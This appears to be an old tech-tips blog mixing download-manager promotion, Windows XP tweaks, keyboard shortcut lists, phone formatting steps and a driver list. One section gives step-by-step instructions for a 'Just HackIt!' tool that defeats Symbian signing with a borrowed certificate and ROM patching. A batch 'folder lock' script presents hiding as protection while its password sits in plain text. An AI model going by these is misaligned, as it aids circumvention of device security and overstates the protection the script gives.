Saturday, December 17, 2011

Internet Download Manager Free

Internet Download Manager (IDM)

is a tool to increase download speeds by up to 5 times, resume and
schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.


Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.

Version 6.07 adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.


Click Here

Wednesday, May 11, 2011

WHAT IS BLUETOOTH

Bluetooth is a global de facto standard for wireless connectivity. Based on a low-cost, short-range radio link, Bluetooth cuts the cords that used to tie up digital devices.
When two Bluetooth equipped devices come within 10 meters range of each other, they can establish a connection together. And because Bluetooth utilizes a radio-based link, it doesn't require a line-of-sight connection in order to communicate. Your laptop could send information to a printer in the next room, or your microwave could send a message to your mobile phone telling you that your meal is ready.

In the future, Bluetooth is likely to be standard in tens of millions of mobile phones, PCs, laptops and a whole range of other electronic devices. As a result, the market is going to demand new innovative applications, value-added services, end-to-end solutions and much more. The possibilities opened up really are limitless, and because the radio frequency used is globally available, Bluetooth can offer fast and secure access to wireless connectivity all over the world. With potential like that, it's no wonder that Bluetooth is set to become the fastest adopted technology in history


Blue Tooth in action

Bluetooth can give you a new kind of freedom. You might share information, synchronize data, access the Internet, integrate with LANs or even unlock your car - all by simply using your Bluetooth equipped mobile phone.


At first, Bluetooth will begin to replace the cables that connect various digital devices. Imagine a headset for your mobile phone that does not need a cable - calls are transmitted wirelessly to your earpiece. Bluetooth will also allow you to surf the Web with your laptop while your phone is in your bag, or effortlessly exchange information such as calendar appointments or contacts data with your colleagues.
Bluetooth might also be used in Mobile Imaging. Nokia and Fujifilm have been developing a prototype Mobile Imaging technology, allowing a modified Nokia 9110 Communicator containing a Bluetooth chip to receive images taken on a Bluetooth equipped Fujifilm digital camera. After adding a few lines of text, the user can send the received photograph to another Nokia Communicator, or to the Fujifilm Web service, where it could be viewed, printed or saved on a CD-R. By combining the ease of SMS messaging with digital photography, Mobile Imaging is a clear indication of the potential of Bluetooth.

Add A Photo To My Computer Properties

STEPS R AS UNDER :

1. Open Notepad

2. Type the following:

[General]
Manufacturer="your_name"
[Support Information]
Line1= http://yourwebsite.com
Line2= visit http://sayyedhamid.blogspot.com for more info

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32folder as "oemlogo.bmp"(Without Quote).The size of the image should be within 180 (wide) x120 (high) pixels

5. Now Check your My Computer Properties.

It's tested and working

Change Folder Background With Image In my compute

So here I'm posting 3 method to have any desired wallpaper as background image in any folder in Windows XP

A. Using Desktop.ini Hack to Set a Wallpaper as Folder Background Image

1. Open Command Prompt and set folder attribute to system. Suppose there is a folder Setup in D drive, in which you want to set a wallpaper as background image. So give following command in Command Prompt

attrib +s DSetup

It'll change the attribute to system.

2. Now open Notepad and paste following code

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC} = {BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=path_of_the_wallpaper
IconArea_Text=0x00000000

Now change path_of_the_wallpaper to the exact path of the wallpaper which you want to set as background. Suppose the wallpaper is stored in DWallpaperImage1.jpg, then the code will be as following

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC} = {BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=DWallpaperImage1.jpg
IconArea_Text=0x00000000

NOTE If you copy the wallpaper in the same folder which you are editing, then you can simply put the wallpaper name in the file. e.g. if you copy the Image1.jpg file in Setup folder, then the code will be as following

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC} = {BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=Image1.jpg
IconArea_Text=0x00000000

IconArea_Text stands for the text color, you can change it to white, yellow, blue, black or any other color. You just need to know the hexa-decimal number of the color and then replace the code in IconArea_Text section. A few most used color codes are as follows

Black - 0x00000000
White - 0x00FFFFFF
Green - 0x0000FF00
Blue - 0x00FF0000
Purple - 0x00C000C0
Red - 0x000000FF
Yellow - 0x0000FFFF
Indigo - 0x00FFFF00

3. Now save the file with name Desktop.ini (including quotes) and copy the file in the desired folder which is Setup in our example.

4. Thats it. Close the folder and re-open it. Now it should show the wallpaper as background.

B. Using the Same Method of IEShwiz.exe file used in Windows 9xNT2000

1. Copy IEShwiz.exe file from Windows 98MeNT2000 and paste in %windir% directory (CWindows, if your Windows is installed in C drive).

2. Now open regedit and goto

HKEY_LOCAL_MACHINESOFTWAREClassesDirectoryshell

Now under this key, create a new key Customize This Folder. Now select this newly created key and create another key under it with the name Command. Select this new key Command and change the value of Default in right side pane to IESHWIZ.EXE %1

3. Thats it. Now open any folder and right-click, you'll get an option Customize This Folder. Click on it and follow the wizard and you'll be able to set a wallpaper as the background and to change font color.
Post Your Problems With This Trick In Comments section
Plese support us

Folder Lock without any Software

Many people have been looking for a way to lock folders without the use of any alternative software. So, here you go.

Here is the easy method to lack the folders without using a software.
Open Notepad and copy the below code and save as locker.bat. Please don't forget to change your password in the code it's shown the place where to type your password.
Now double click on locker .bat
First time start, it will create folder with Locker automatically for u. After creation of the Locker folder, place the contents u want to lock inside the Locker Folder and run locker.bat again. The Locker folder disappears from the window. To make the folder available again, double click the locker.bat and enter the password. And you get your folder back!


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
09D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

A To Z Keyboard Shortcuts

Shift + F10 right-clicks.

Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.

Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.

Win + Control + F: Open Find dialog. (Computers)

Win + U: Open Utility Manager.

Win + F1: Open Windows help.

Win + Pause: Open System Properties dialog.

Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.

Win + Shift + Tab: Cycle through taskbar buttons in reverse.

Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.

Alt + Shift + Tab: Display Cool Switch; go in reverse.

Alt + Escape: Send active window to the bottom of the z-order.

Alt + Shift + Escape: Activate the window at the bottom of the z-order.

Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.

Shift while a CD is loading: Bypass AutoPlay.

Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)

Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.

Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.

Print screen: Copy screenshot of current screen to clipboard.

Alt + Print screen: Copy screenshot of current active window to clipboard.

Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.

Ctrl + Alt + Up Arrow: Undo inversion.

Win + B : Move focus to systray icons.


General


Ctrl + C or Ctrl + Insert: Copy.

Ctrl + X or Shift + Delete: Cut.

Ctrl + V or Shift + Insert: Paste/Move.

Ctrl + N: New... File, Tab, Entry, etc.

Ctrl + S: Save.

Ctrl + O: Open...

Ctrl + P: Print.

Ctrl + Z: Undo.

Ctrl + A: Select all.

Ctrl + F: Find...

Ctrl+W : to close the current window

Ctrl + F4: Close tab or child window.

F1: Open help.

F11: Toggle full screen mode.

Alt or F10: Activate menu bar.

Alt + Space: Display system menu. Same as clicking the icon on the titlebar.

Escape: Remove focus from current control/menu, or close dialog box.

General Navigation


Tab: Forward one item.

Shift + Tab: Backward one item.

Ctrl + Tab: Cycle through tabs/child windows.

Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.

Enter: If a button's selected, click it, otherwise, click default button.

Space: Toggle items such as radio buttons or checkboxes.

Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.

Ctrl + Left: Move cursor to the beginning of previous word.

Ctrl + Right: Move cursor to the beginning of next word.

Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.

Ctrl + Down: Move cursor to beginning of next paragraph.

Shift + Left: Highlight one character to the left.

Shift + Right: Highlight one character to the right.

Shift + Up: Highlight from current cursor position, to one line up.

Shift + Down: Highlight from current cursor position, to one line down.

Ctrl + Shift + Left: Highlight to beginning of previous word.

Ctrl + Shift + Right: Highlight to beginning of next word.

Ctrl + Shift + Up: Highlight to beginning of previous paragraph.

Ctrl + Shift + Down: Highlight to beginning of next paragraph.

Home: Move cursor to top of a scrollable control.

End: Move cursor to bottom of a scrollable control.

File Browser

Arrow Keys: Navigate.

Shift + Arrow Keys: Select multiple items.

Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.

(Letter): Select first found item that begins with (Letter).

BackSpace: Go up one level to the parent directory.

Alt + Left: Go back one folder.

Alt + Right: Go forward one folder.

Enter: Activate (Double-click) selected item(s).

Alt + Enter: View properties for selected item.

F2: Rename selected item(s).

Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.

Delete: Delete selected item(s).

Shift + Delete: Delete selected item(s); bypass Recycle Bin.

Ctrl while dragging item(s): Copy.

Ctrl + Shift while dragging item(s): Create shortcut(s).

In tree pane, if any:

Left: Collapse the current selection if expanded, or select the parent folder.

Right: Expand the current selection if collapsed, or select the first subfolder.

Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.

Numpad Plus: Expand currently selected directory.

Numpad Minus: Collapse currently selected directory.

Accessibility

Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.

Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.

Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.

NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.

Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.

6.) Microsoft Natural Keyboard with IntelliType Software Installed

Win + L: Log off Windows.

Win + P: Open Print Manager.

Win + C: Open control panel.

Win + V: Open clipboard.

Win + K: Open keyboard properties.

Win + I: Open mouse properties.

Win + A: Open Accessibility properties.

Win + Space: Displays the list of Microsoft IntelliType shortcut keys.

Win + S: Toggle CapsLock on and off.

Remote Desktop Connection Navigation



Ctrl + Alt + End: Open the NT Security dialog.

Alt + PageUp: Switch between programs.

Alt + PageDown: Switch between programs in reverse.

Alt + Insert: Cycle through the programs in most recently used order.

Alt + Home: Display start menu.

Ctrl + Alt + Break: Switch the client computer between a window and a full screen.

Alt + Delete: Display the Windows menu.

Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.

Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.

Mozilla Firefox Shortcuts

Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.

Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.

Ctrl + (1-9): Switch to tab corresponding to number.

Ctrl + N: New window.

Ctrl + T: New tab.

Ctrl + L or Alt + D or F6: Switch focus to location bar.

Ctrl + Enter: Open location in new tab.

Shift + Enter: Open location in new window.

Ctrl + K or Ctrl + E: Switch focus to search bar.

Ctrl + O: Open a local file.

Ctrl + W: Close tab, or window if there's only one tab open.

Ctrl + Shift + W: Close window.

Ctrl + S: Save page as a local file.

Ctrl + P: Print page.

Ctrl + F or F3: Open find toolbar.

Ctrl + G or F3: Find next...

Ctrl + Shift + G or Shift + F3: Find previous...

Ctrl + B or Ctrl + I: Open Bookmarks sidebar.

Ctrl + H: Open History sidebar.

Escape: Stop loading page.

Ctrl + R or F5: Reload current page.

Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.

Ctrl + U: View page source.

Ctrl + D: Bookmark current page.

Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.

Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.

Ctrl + Numpad0 or Ctrl + 0: Set text size to default.

Alt + Left or Backspace: Back.

Alt + Right or Shift + Backspace: Forward.

Alt + Home: Open home page.

Ctrl + M: Open new message in integrated mail client.

Ctrl + J: Open Downloads dialog.

F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.

Shift + F6: Switch to previous frame.

Apostrophe ('): Find link as you type.

Slash (/): Find text as you type.

Gmail Shortcuts

Note: Must have "keyboard shortcuts" on in settings.

C: Compose new message.

Shift + C: Open new window to compose new message.

Slash (/): Switch focus to search box.

K: Switch focus to the next most recent email. Enter or "O" opens focused email.

J: Switch focus to the next oldest email.

N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.

P: Switch focus to the previous message.

U: Takes you back to the inbox and checks for new mail.

Y: Various actions depending on current view:

Has no effect in "Sent" and "All Mail" views.

Inbox: Archive email or message.

Starred: Unstar email or message.

Spam: Unmark as spam and move back to "Inbox."

Trash: Move back to "Inbox."

Any label: Remove the label.

X: "Check" an email. Various actions can be performed against all checked emails.

S: "Star" an email. Identical to the more familiar term, "flagging."

R: Reply to the email.

A: Reply to all recipients of the email.

F: Forward an email.

Shift + R: Reply to the email in a new window.

Shift + A: Reply to all recipients of the email in a new window.

Shift + F: Forward an email in a new window.

Shift + 1 (!): Mark an email as spam and remove it from the inbox.

G then I: Switch to "Inbox" view.

G then S: Switch to "Starred" view.

G then A: Switch to "All Mail" view.

G then C: Switch to "Contacts" view.

G then S: Switch to "Drafts" view.

List of F1-F9 Key Commands for the Command Prompt



F1 / right arrow: Repeats the letters of the last command line, one by one.

F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line

F3: Repeats the last command line

F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line

F5: Goes back one command line

F6: Enters the traditional CTRL+Z (^z)

F7: Displays a menu with the command line history

F8: Cycles back through previous command lines (beginning with most recent)

F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.

Alt+Enter: toggle full Screen mode.

up/down: scroll thru/repeat previous entries

Esc: delete line

Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.

Helpful accessibility keyboard shortcuts

Switch FilterKeys on and off. Right SHIFT for eight seconds

Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN

Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK

Switch StickyKeys on and off. SHIFT five times

Switch ToggleKeys on and off. NUM LOCK for five seconds

FORMAT YOUR SYMBIAN S60 MOBILES

To format your S60 phones follow the below steps..
If your phone is switched on dial the below number.

*#7780# or
*#7370#
Phone will ask for confirmation and security code (Default security code is 12345),

Note :Your datas will be erased.

Second method is hard reset.To do so follow the below steps

If your phone is not switch off ,Switch off it..
Press and hold following three keys simultaneously
Green Key (OK or Number Dialing key), Star key (*) and Three key (3 number key)

Press and hold the keys and switch on your phone by pressing power button.Hold the three buttons until the format screen appears

Now your phone gets formated..

REMOVE SYMBIAN VIRUS FROM MOBILES

Virus infected Nokia 6600 to be cleaned. The phone’s battery was draining too fast and it was sending automatic Bluetooth connection requests to other mobiles. Rather than choosing the conventional method (Formatting the phone and memory card), I decided to experiment a bit and work on a different line of action. The strategy was, to find and delete the virus files manually.
To start with, I installed X-plore in the phone and searched for the virus related files and folders. Soon I found the culprit files (cpun.exe, cpun.mdl and some other suspicious looking files). I knew that, as long as the virus is running as a process, these files cannot be deleted (The virus will recreate them again) and hence the virus process must be terminated first. To do this I opened ‘Processes’ under ‘Menu/Tools’ in X-plore. There I found above named process and bingo, I thought the battle is won. But to my horror, when I tried to terminate the virus process, X-plore crashed. I tried again and again but X-plore crashed every time. Frustrated, I tried FExplorer but it failed too. As a last resort I installed and used another file manager application ‘System Explorer’ and to my delight it terminated the culprit process without any hassle. After this I deleted all the virus related files and the phone became perfectly fine. Note however that if you are not familiar with the phone’s files and processes then please DO NOT attempt to terminate any process or delete any file suspecting it as a virus. This way you may harm your mobile and it is always safer to choose the conventional way to remove the virus.
Currently, System Explorer is compatible with Symbian S60 1st and 2nd edition phones only. DOWNLOAD FROM http://www.ziddu.com/download/3196259/SystemExplorer.zip.html
Anyway, this experiment also proved that ‘System Explorer’ is more powerful than X-plore (Otherwise the best file manager app), in terminating the processes. Are Lonelycatgames guys reading?

Monday, May 2, 2011

Automated hacking Symbian. Just HackIt! - V.1.1

Category: Software for hacking
JustHackIt_v1.1
Application for easy hacking of any company NOKIA smartphone on Symbian version 9 and above.
The authors of the application: CODeRUS and Kolayuk (Russia)
In archive two files.
CertUpdater.sisx - it is Nokia Ovi Provisioner
CertHack_Installer.sis - aka Just HackIt!

Instructions for hacking:
0. Get a personal certificate from whom it is not.
1. C using FreeSigner sign CertHack_Installer.sis
2. Installing CertUpdater.sisx. If the phone says that application is already installed, you can not put the file. This component is part of an update for OviStore.
3. Installing the earlier signings you CertHack_Installer.sis
4. In the menu click on the icon HackIt! and wait for the end of the break-in. During the burglary application installs the root certificate Leftup into the system. For smartphones S ^ 3 will be automatically installed FileBrowser S ^ 3. For all other smart phones will be installed RomPatcher + v2.6. Also at 9.4, and S ^ 3 is copied Installserver (during the break will be asked), then you can install any unsigned applications. Others use the patch in RomPatcher or copy themselves Installserver for your smartphone here (copy to folder c: \ sys \ bin \).
To gain full access to system folders owners S ^ 3 should be used FileBrowser. Do not forget to go to settings, go to the second tab and put into all of Yes!.
The owners of other smartphones simply apply the patch in Open4all RomPatcher.
After a successful break-delete HackIt!, The more he will not need.
When an error occurs, the application will ask to reboot the phone, agree to and after restarting run HackIt! again.
Easy hacking you!




Download Here.........Download

Tuesday, April 12, 2011

Install Universal Driver all in One






Universal Driver

Program Benefits:
- Identification of all mobile phones automatically in modes: Modem, Data storage, Printing, Media, Suite
- Automatically detect the egat boxes and Uart Usb Port Mode and Port Identification box.
- Identifying the phone ports used.
- Automatic detection and installation of various dongles egat
- All installed devices to create without the interference.
- Run all the applications without problems and error messages.

This is list of Driver that will be installed :

3G PC UI Interface
6218 USB Modem Driver
Accessories Interface
ADL Flashing Engine AVALON Generic
ADL Flashing Engine AVALON Parent
AdvanceBox Programming Port
AdvanceBox Turbo Flasher
Aladdin HASP Key
Aladdin USB Key
Android Bootloader Interface
Apple iPod USB Driver
Apple Mobile Device USB Driver
Apple Recovery (DFU) USB Driver
Apple Recovery (iBoot) USB Driver
ATK0110 ACPI UTILITY
BenQ-EF82
BenQ-S80_WCDMA_Handset_Drivers_v2701
BenQ-S80_WCDMA_Handset_Drivers_v2703
BenQ-S82_BenQWCDMAInstaller
Blackberry Handheld
BlackBerry Smartphone
Communications Class - Control Interface
Communications Class - Data Interface
CruiserTeam Universal Cable UC-10
Cyclone Box
Data Logging MCU Interface
Dream Box
EDGE MODEMN
EF82
e-gate Smart Card
e-gate USB Smart Card
e-gate USB Smart card reader
e-gate Virtual Reader Enumerator
Fighter USB Composite Device
Flash Loader utility
Generic Flash Device
GriffinTeam Virtual COM
High Precision Event Timer
HTC Diagnostic Interface
HTC Touch Pro2 T7373
INQ1 Diagnostics Interface
INQ1 NMEA Device
INQ1 PCSYNC Device
INQ1 USB Modem
JAF FLASHER INTERFACE
JAF Port
LGE Mobile
LGE Mobile Composite USB Device
LGE Mobile USB Modem
LGE Mobile USB Serial Port
LGE Mobile USB WMC Data Modem
LGE Mobile USB WMC Device Management
LGE Mobile USB WMC Ethernet (NDIS 5)
LGE Mobile USB WMC Ethernet (WDM)
LGE Mobile USB WMC Modem
LGE Mobile USB WMC OBEX Interface
LOCOSTO Flash Interface
Microsoft Windows Mobile Remote Adapter
Mobile Adapter - Modem
Mobile Adapter - PC UI Interface
Motorola Flash Interface
Motorola MTP Device
Motorola USB Composite Device
Motorola USB Modem
Motorola USB Networking Driver
MSS Box II Device (Driver v2.50.0)
MT-Box Flashing Interface
My HTC
NEC 338 USB Controller
NEC 338 USB IPL Port
NEC 616 USB Command Port
NEC 616 USB Controller
NEC 616 USB Modem
NEC 616 USB OBEX Port
NMP FLC-20 USB
Nokia USB
Nokia USB Generic
Nokia USB LCIF
Nokia USB Modem
Nokia USB OBEX
Nokia 5130 XPressMusic USB
Nokia 5130 XPressMusic USB Generic
Nokia 5130 XPressMusic USB LCIF
Nokia 5130 XPressMusic USB Modem
Nokia 5130 XPressMusic USB OBEX
Nokia 5130 XPressMusic USB Phone Parent
Nokia 5230 USB
Nokia 5230 USB Generic
Nokia 5230 USB LCIF
Nokia 5230 USB Modem
Nokia 5230 USB OBEX
Nokia 5230 USB Phone Parent
Nokia 5330 Mobile TV Edition USB
Nokia 5330 Mobile TV Edition USB Generic
Nokia 5330 Mobile TV Edition USB LCIF
Nokia 5330 Mobile TV Edition USB Modem
Nokia 5330 Mobile TV Edition USB OBEX
Nokia 5330 Mobile TV Edition USB Phone Parent
Nokia 5610 XpressMusic USB
Nokia 5610 XpressMusic USB Generic
Nokia 5610 XpressMusic USB LCIF
Nokia 5610 XpressMusic USB Modem
Nokia 5610 XpressMusic USB OBEX
Nokia 5610 XpressMusic USB Phone Parent
Nokia 5610d-1
Nokia 5800 XpressMusic USB
Nokia 5800 XpressMusic USB Generic
Nokia 5800 XpressMusic USB LCIF
Nokia 5800 XpressMusic USB Modem
Nokia 5800 XpressMusic USB OBEX
Nokia 5800 XpressMusic USB Phone Parent
Nokia 6120 classic USB
Nokia 6120 classic USB Generic
Nokia 6120 classic USB LCIF
Nokia 6120 classic USB Modem
Nokia 6120 classic USB OBEX
Nokia 6120 classic USB Phone Parent
Nokia 6220 classic USB Generic
Nokia 6220 classic USB Phone Parent
Nokia 6303 classic USB
Nokia 6303 classic USB Generic
Nokia 6303 classic USB LCIF
Nokia 6303 classic USB Modem
Nokia 6303 classic USB OBEX
Nokia 6303 classic USB Phone Parent
Nokia 6303i classic USB
Nokia 6303i classic USB Generic
Nokia 6303i classic USB LCIF
Nokia 6303i classic USB Modem
Nokia 6303i classic USB OBEX
Nokia 6303i classic USB Phone Parent
Nokia 6500 slide USB
Nokia 6500 slide USB Generic
Nokia 6500 slide USB LCIF
Nokia 6500 slide USB Modem
Nokia 6500 slide USB OBEX
Nokia 6500 slide USB Phone Parent
Nokia 6600i slide USB
Nokia 6600i slide USB Generic
Nokia 6600i slide USB LCIF
Nokia 6600i slide USB Modem
Nokia 6600i slide USB OBEX
Nokia 6600i slide USB Phone Parent
Nokia 6700 classic USB
Nokia 6700 classic USB Generic
Nokia 6700 classic USB LCIF
Nokia 6700 classic USB Modem
Nokia 6700 classic USB OBEX
Nokia 6700 classic USB Phone Parent
Nokia 6700 slide USB
Nokia 6700 slide USB Generic
Nokia 6700 slide USB LCIF
Nokia 6700 slide USB Modem
Nokia 6700 slide USB OBEX
Nokia 6700 slide USB Phone Parent
Nokia 6790 slide USB
Nokia 6790 slide USB Generic
Nokia 6790 slide USB LCIF
Nokia 6790 slide USB Modem
Nokia 6790 slide USB OBEX
Nokia 6790 slide USB Phone Parent
Nokia 7020 USB
Nokia 7020 USB Generic
Nokia 7020 USB LCIF
Nokia 7020 USB Modem
Nokia 7020 USB OBEX
Nokia 7020 USB Phone Parent
Nokia 7230 USB
Nokia 7230 USB Generic
Nokia 7230 USB LCIF
Nokia 7230 USB Modem
Nokia 7230 USB OBEX
Nokia 7230 USB Phone Parent
Nokia 8800 Arte USB
Nokia 8800 Arte USB Generic
Nokia 8800 Arte USB LCIF
Nokia 8800 Arte USB Modem
Nokia 8800 Arte USB OBEX
Nokia 8800 Arte USB Phone Parent
Nokia 8800e-1
Nokia BB5 ADL Loader USB Generic
Nokia BB5 ADL Loader USB Phone Parent
Nokia C5-00 USB Generic
Nokia C5-00 USB Phone Parent
Nokia C6-00 USB
Nokia C6-00 USB Generic
Nokia C6-00 USB LCIF
Nokia C6-00 USB Modem
Nokia C6-00 USB OBEX
Nokia C6-00 USB Phone Parent
Nokia N82
Nokia N82 USB
Nokia N82 USB Generic
Nokia N82 USB Modem
Nokia N82 USB OBEX
Nokia N82 USB Phone Parent
Nokia N85 USB Generic
Nokia N85 USB Phone Parent
Nokia N86 USB
Nokia N86 USB Generic
Nokia N86 USB LCIF
Nokia N86 USB Modem
Nokia N86 USB OBEX
Nokia N86 USB Phone Parent
Nokia N900 USB Generic
Nokia N900 USB Modem
Nokia N900 USB OBEX
Nokia N900 USB Phone Parent
Nokia N96
Nokia N96 USB
Nokia N96 USB Generic
Nokia N96 USB LCIF
Nokia N96 USB OBEX
Nokia N96 USB Phone Parent
Nokia N97 mini USB
Nokia N97 mini USB Generic
Nokia N97 mini USB LCIF
Nokia N97 mini USB Modem
Nokia N97 mini USB OBEX
Nokia N97 mini USB Phone Parent
Nokia N97 USB
Nokia N97 USB Generic
Nokia N97 USB LCIF
Nokia N97 USB Modem
Nokia N97 USB OBEX
Nokia N97 USB Phone Parent
Nokia USB Flashing Generic
Nokia USB Flashing Parent
Nokia USB Phone Parent
Nokia X3 USB
Nokia X3 USB Generic
Nokia X3 USB LCIF
Nokia X3 USB Modem
Nokia X3 USB OBEX
Nokia X3 USB Phone Parent
Nokia X6-00 USB Generic
Nokia X6-00 USB Phone Parent
NsPro Box
NsPro Converter
NsPro Port
O2X4
ORT-JTAG
Prolific USB-to-Serial Bridge
Prolific USB-to-Serial Comm Port
Prolific USB-to-Serial Comm Port (COM5)
Qualcomm Diagnostics Interface 3197
Qualcomm Diagnostics Interface 6000
Qualcomm NMEA Device
Qualcomm USB Modem 6000
RIFF BOX Control Port
RIFF BOX Firmware Update Port
RIM Virtual Serial Port v2
RIM Virtual Serial Port v2 (COM14)
RIM Virtual Serial Port v2 (COM15)
RIM Virtual Serial Port v2 (COM30)
RIM Virtual Serial Port v2 (COM31)
S80_WCDMA_Handset_Drivers_v2701
S80_WCDMA_Handset_Drivers_v2703
S82_BenQWCDMAInstaller
SAMSUNG Android Composite ADB Interface
SAMSUNG Android USB Composite Device
SAMSUNG Android USB Modem
SAMSUNG Mobile Modem
SAMSUNG Mobile USB Device
SAMSUNG Mobile USB Modem
SAMSUNG Mobile USB Port
SAMSUNG USB Composite Device
SAMSUNG USB Mobile Device
SAMSUNG USB Mobile Modem
SCI USB2Serial
SEC SOC Test Board
SEMC Flash Device
Smart-Clip to USB adapter
SMTi Device
Sony Ericsson Cable Emulation Bus
Sony Ericsson Composite Device
Sony Ericsson Device 116
Sony Ericsson Device 116 USB WMC Device Management
Sony Ericsson Device 116 USB WMC Data Modem
Sony Ericsson Device 116 USB WMC Modem
Sony Ericsson Device 816
Sony Ericsson Device 816 USB Ethernet Emulation (NDIS 5)
Sony Ericsson Device 816 USB Ethernet Emulation (WDM)
Sony Ericsson Device 816 USB WMC Data Modem
Sony Ericsson Device 816 USB WMC Device Management
Sony Ericsson Device 816 USB WMC Modem
Sony Ericsson Device 816 USB WMC OBEX Interface
Sony Ericsson Master Port
Sony Ericsson seehcri Control Device
Sony Ericsson Slave Port
Sony Ericsson USB Flash
Sony Ericsson W950 Application Port
Sony Ericsson W950 Composite Device
Sony Ericsson W950 PC-Connect Controller
Sony Ericsson W950 USB Modem
Sony Ericsson X2 Diagnostics Interface
Sony Ericsson X2 NMEA Device
Sony Ericsson X2 Software Download
Sony Ericsson X2 USB Modem semdm
SphereGSM Fighter Cable
Spider-BOX-USB_2007
Test Command Interface
UC-10 USB Composite Device
UFSx Device, (c) SarasSoft
ULT Pro Device
ULT Pro Port
Universal Box
UniversalBox
UniversalBox Nokia Device Driver
USB - RS232 by Vygisoft
USB Flash Loader utility
USB FT SCR2000 Device
